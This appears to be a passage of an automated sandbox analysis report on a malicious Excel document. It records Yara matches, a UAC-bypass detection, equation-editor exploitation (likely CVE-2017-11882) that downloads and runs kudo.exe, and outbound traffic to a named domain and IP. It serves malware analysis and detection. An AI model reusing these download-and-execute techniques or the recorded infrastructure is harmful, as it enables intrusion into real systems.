              Source: Yara matchFile source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HKP098767890HJ[1].exeJoe Sandbox ML: detected
              Source: outvaunts.exe, 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4004ed76-8

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.outvaunts.exe.cd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 21.2.outvaunts.exe.fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 37.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.outvaunts.exe.260000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.outvaunts.exe.1100000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.2.outvaunts.exe.1110000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 33.2.outvaunts.exe.10c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.outvaunts.exe.1140000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.outvaunts.exe.780000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.outvaunts.exe.690000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.outvaunts.exe.f30000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.outvaunts.exe.200000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.outvaunts.exe.730000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.outvaunts.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.outvaunts.exe.6f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.491126682.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.502121534.00000000010F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.486635127.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.495335486.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.497633838.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.462606434.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.484506000.0000000001100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.477654786.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.497407700.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.507081742.0000000001120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.507117715.0000000000FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470039359.0000000000200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.495612198.0000000001110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.505035700.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.493738925.0000000002930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.484185686.0000000001230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.499912283.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.480368571.00000000011A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.466780425.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.464145461.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.500259238.0000000001160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.468349006.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.489374331.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.492970450.0000000001130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000024.00000002.504422653.0000000000670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.460878413.0000000000690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.474306175.0000000001140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.472731658.00000000010D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.502521192.0000000001180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.475929064.0000000000770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTR
              Office equation editor establishes network connection
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 161.132.57.101 Port: 443Jump to behavior
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\kudo.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\kudo.exeJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 161.132.57.101:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0086445A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086C6D1 FindFirstFileW,FindClose,5_2_0086C6D1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0086C75C
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086EF95
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0086F0F2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086F3F3
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008637EF
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00863B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00863B12
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0086BCBC
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_013C445A
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_013CC75C
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CC6D1 FindFirstFileW,FindClose,6_2_013CC6D1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_013CEF95
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_013CF0F2
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_013CF3F3
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_013C37EF
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_013C3B12
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_013CBCBC

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Shellcode detected
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03D5 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03D5
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C04C1 ShellExecuteExW,ExitProcess,2_2_035C04C1
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C0460 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C0460
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C04DF ExitProcess,2_2_035C04DF
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C034B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C034B
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C0332 ExitProcess,2_2_035C0332
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C03EF URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C03EF
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C04AA ShellExecuteExW,ExitProcess,2_2_035C04AA
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C0367 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035C0367
              Source: global trafficDNS query: name: www.grupodulcemar.pe
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 161.132.57.101:443
